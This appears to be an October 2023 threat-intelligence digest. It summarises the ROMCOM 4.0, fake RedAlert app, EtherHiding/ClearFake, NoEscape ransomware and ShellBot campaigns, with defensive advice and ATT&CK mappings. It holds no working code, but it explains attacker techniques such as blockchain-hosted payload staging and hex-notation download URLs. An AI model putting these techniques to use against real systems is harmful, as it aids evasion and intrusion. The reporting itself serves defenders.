The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Backdoors, Blockchain, Botnets, Hexadecimal IP notation, Infostealers, and Ransomware. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant
(published: October 13, 2023)
The threat group Tropical Scorpius (Void Rabisu, Storm-0978, and UNC2596) became known for its financially motivated attacks, such as those involving the Cuba ransomware. However, it gradually shifted its focus to cyberespionage attacks. Trend Micro researchers describe the group’s emphasis on their custom RomCom RAT/backdoor, which is continuously evolving. The latest version, ROMCOM 4.0 (PEAPOD), has been streamlined to its core functions, with additional components (COM hijacking loader, worker, and network modules) being downloaded as needed. The most recent set of attacks, detected in August 2023, delivered ROMCOM 4.0 via a website that mimics a legitimate site of the Women Political Leaders Summit in Brussels, Belgium. The target is prompted to open a malicious EXE file that downloads an XOR-encrypted DLL, which, in turn, downloads the other components. This continues the trend of Tropical Scorpius targeting conferences, primarily focusing on defense and government targets in Ukraine and countries supporting Ukraine.
Analyst Comment: Tropical Scorpius has targeted participants of at least three conferences in 2023, increasing the threat to other conferences and special interest groups. Anomali customers concerned about risks to their digital assets (including similar/typosquatted domains) can try out Anomali’s Premium Digital Risk Protection service. All known indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Command and Control – Remote File Copy [T1105] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] T1546.015 – Event Triggered Execution: Component Object Model Hijacking | [MITRE ATT&CK] Picus: The System Information Discovery Technique Explained – MITRE ATT&CK T1082 | [MITRE ATT&CK] T1005: Data from Local System | [MITRE ATT&CK] Defense Evasion – Indicator Removal: File Deletion [T1070.004] | [MITRE ATT&CK] T1070.009 – Indicator Removal: Clear Persistence
Tags: actor:Void Rabisu, actor:Storm-0978, actor:Tropical Scorpius, actor:UNC2596, malware:ROMCOM, malware:ROMCOM 4.0, malware:PEAPOD, malware-type:Backdoor, target-industry:Politics, target-industry:Military, target-industry:Defense, target-industry:Government, target-region:Europe, threat-type:Cyberespionage, vulnerability:CVE-2023-36884, technique:COM hijacking, technique:Memory-only execution, technique:Named pipe, technique:TLS-enforcing, technique:Typosquatting, abused:OneDrive, abused:Elbor LLC, source-country:RU, file-type:DLL, file-type:EXE, file-type:ICO, target-system:Windows
Malicious “RedAlert – Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
(published: October 13, 2023)
On October 13, 2023, Cloudflare researchers discovered a typosquatted website hosting an Android infostealer impersonating the legitimate “RedAlert – Rocket Alerts” (RedAlert by Elad Nava) application. It targets Israeli users with a malicious app that has an appearance of the legitimate app it tries to impersonate. Its onCreate() method was modified with a startService() call that reaches to a malicious package called “com.company.allinclusive.AI.” The malicious app relies on additional permissions to collect an extensive list of sensitive user data, including contacts, call logs, SMS, account information, and an overview of all installed apps. The stolen data is encrypted with AES in CBC mode with PKCS5 Padding. The keys and data in transit are protected from decryption by additional encryption with RSA using a public key bundled in the malicious app.
Analyst Comment: The identified typosquatting domain that was staging the malicious version of the RedAlert by Elad Nava, has been taken offline, but the users who installed it are urgently advised to delete the app. Users can identify compromise if the following permissions appear on the RedAlert app (whether or not enabled): Call Logs, Contacts, Phone, and SMS. It is crucial to install legitimate versions directly from the official mobile stores, such as the Play Store for Android phones. Keep your mobile device up to date on the latest software version, and avoid installing applications from Internet URLs or sideload payloads. All known indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1633 – Virtualization/Sandbox Evasion | [MITRE ATT&CK] T1633.001 – Virtualization/Sandbox Evasion: System Checks | [MITRE ATT&CK] T1424 – Process Discovery | [MITRE ATT&CK] T1426 – System Information Discovery | [MITRE ATT&CK] T1533 – Data From Local System | [MITRE ATT&CK] T1521.002 – Encrypted Channel: Asymmetric Cryptography | [MITRE ATT&CK] T1437.001 – Application Layer Protocol: Web Protocols | [MITRE ATT&CK] T1646 – Exfiltration Over C2 Channel
Tags: target-country:IL, threat-type:Fake mobile app, technique:Typosquatting, technique:Requesting additional permissions, impersonated:RedAlert by Elad Nava, impersonated:RedAlert – Rocket Alerts, target-system:Android
“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart Contracts
(published: October 13, 2023)
A new technique of serving malicious code, dubbed EtherHiding, utilizes Binance’s Smart Chain contracts to host malicious code. This technique has been used since at least September 9, 2023, as part of the ClearFake campaign. Attackers insert first-stage malicious code into the primary template of a WordPress site by exploiting vulnerable plugins, outdated WordPress versions, or by acquiring stolen site credentials. The second stage payload is received from the hardcoded smart contract on the Binance Smart Chain (BSC) blockchain. The attackers are able to frequently modify this payload thus changing the third-stage payload domain on almost a daily basis. This third-stage payload is defacing the WordPress site with a deceptive overlay page localized and customized for almost all popular browsers. A site visitor downloading the fake browser update is being hit with one of the commodity infostealers (Amadey, Lumma, or RedLine).
Analyst Comment: Blockchain hosting makes this campaign difficult to detect and take down. Website administrators should focus on WordPress security, such as using strong, unique admin passwords, keeping plugins up to date, and removing unused add-ons and accounts. Indicators for this ClearFake campaign and associated commodity infostealers are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Initial Access – Exploit Public-Facing Application [T1190] | [MITRE ATT&CK] Command and Control – Remote File Copy [T1105] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] T1555 – Credentials From Password Stores
Tags: technique:EtherHiding, technique:Blockchain, technique:Fake browser update, campaign:ClearFake, abused:Binance, abused:Cloudflare Worker, abused:Binance Smart Chain, abused:Smart contract, abused:Web3, malware-type:Infostealer, malware:Amadey, malware:Lumma, malware:RedLine, target-software:WordPress, target-system:Windows
NoEscape Ransomware
(published: October 12, 2023)
The NoEscape ransomware-as-a-service (RaaS) affiliate program was first announced on hacker forums on May 22, 2023, but NoEscape samples in the wild go back to at least March 2023. US Health Sector Cybersecurity Coordination Center reports significant similarities to the now-defunct Russian-speaking Avaddon Raas program both in tactics and in malware implementation. The NoEscape crypter is implemented in C++ and runs on Windows NT 10.0 operating systems. It can perform asynchronous LAN scanning, and uses RSA and ChaCha20 encryption to encrypt discovered network file shares and local drives. Apart from typical double extortion threats, NoEscape program offers additional distributed denial-of-service (DDoS), and call and spam services. NoEscape primarily targeted the US followed by Italy, the UK, Canada, and France, and at the same time it implemented geographical exemption for former Soviet Union countries. The most affected was the professional services industry followed by manufacturing, information, education, construction, retail, government, and health care.
Analyst Comment: It is important to have a comprehensive and tested backup solution in place for the unfortunate case of ransomware infection. It is crucial that your company ensure that your systems are always running the most current software version. Always practice defense-in-depth, do not rely on single security mechanisms – security measures should be layered, redundant, and failsafe.
MITRE ATT&CK: [MITRE ATT&CK] Initial Access – External Remote Services [T1133] | [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Execution – User Execution [T1204] | [MITRE ATT&CK] Fishing the Internet: LOLBin Attacks With Scheduled Tasks (T1053.005) and How To Detect Them | [MITRE ATT&CK] Persistence – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] | [MITRE ATT&CK] T1562.001: Disable or Modify Tools | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information: Software Packing [T1027.002] | [MITRE ATT&CK] Defense Evasion – Process Injection [T1055] | [MITRE ATT&CK] Defense Evasion – Indicator Removal: File Deletion [T1070.004] | [MITRE ATT&CK] T1112: Modify Registry | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] Defense Evasion – Virtualization/Sandbox Evasion: System Checks [T1497.001] | [MITRE ATT&CK] Credential Access – OS Credential Dumping [T1003] | [MITRE ATT&CK] Discovery – Domain Trust Discovery [T1482] | [MITRE ATT&CK] T1069 – Permission Groups Discovery | [MITRE ATT&CK] Picus: T1021 Remote Services of the MITRE ATT&CK Framework | [MITRE ATT&CK] Lateral Movement – Remote Services: Remote Desktop Protocol [T1021.001] | [MITRE ATT&CK] T1560.001 – Archive Collected Data: Archive Via Utility | [MITRE ATT&CK] Command and Control – Application Layer Protocol: Web Protocols [T1071.001] | [MITRE ATT&CK] T1567.002 – Exfiltration Over Web Service: Exfiltration To Cloud Storage
Tags: malware:NoEscape, malware-type:Ransomware, detection:Trojan:Win32/Noescape, malware:Avaddon, detection:Ransom.Avaddon, actor:NoEscape, actor-type:RaaS, target-country:US, target-country:IT, target-country:UK, target-country:CA, target-country:FR, target-industry:Professional Services, target-industry:Manufacturing, target-industry:Information, target-industry:Education, target-industry:Construction, target-industry:Retail, target-industry:Government, target-industry:Healthcare, encryption:Salsa20, technique:DDoS, technique:Double extortion, language:C++, target-system:Windows, target-system:Windows NT 10.0
ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses
(published: October 12, 2023)
Since at least 2012, ShellBot (PerlBot) has been used as a DDoS bot of choice installed following a prerequisite attack on poorly managed Linux SSH servers. ShellBot is developed in Perl and uses IRC protocol for C2 communication. In September 2023, AhnLab researchers found that the currently-circulating ShellBot type known as DDoS PBot v2.0 adopted a new URL detection evasion technique. The threat actor has changed the download URL from a regular IP address to a hexadecimal value. For example, the address represented in hexadecimal as “0x2763da4e” corresponds to “39.99.218[.]78”. This technique was previously used by an unrelated phishing PDF malware abusing browsers accepting hexadecimal IP notation. In the case of ShellBot, curl is used for the download and is supporting hexadecimal just like web browsers.
Analyst Comment: Administrators can protect against ShellBot attacks by using strong passwords and rotating their hardened credentials regularly. Indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1498 – Network Denial Of Service | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] T1078.001 – Valid Accounts: Default Accounts | [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Command and Control – Remote File Copy [T1105]
Views: 2